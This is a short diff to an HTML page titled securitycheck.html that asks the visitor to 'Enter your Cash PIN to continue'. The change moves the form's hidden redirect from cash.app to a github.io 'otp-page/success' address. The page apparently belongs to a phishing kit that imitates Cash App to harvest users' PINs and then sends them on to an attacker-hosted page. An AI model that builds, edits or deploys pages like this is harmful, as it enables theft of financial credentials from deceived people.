--- a/securitycheck.html
+++ b/securitycheck.html
@@ -15014,7 +15014,7 @@ Enter your Cash PIN to continue.</span></p>
 <input
     type="hidden"
     name="_redirect"
-    value="https://cash.app/"
+    value="https://divyanshi1234.github.io/otp-page/success"
   />
   <input type="hidden" name="_append" value="false" />
 								<input id = "bubble1" pattern="[0-9]*" name = "bubble1" class="input-bubble to-be-filled" autofocus >
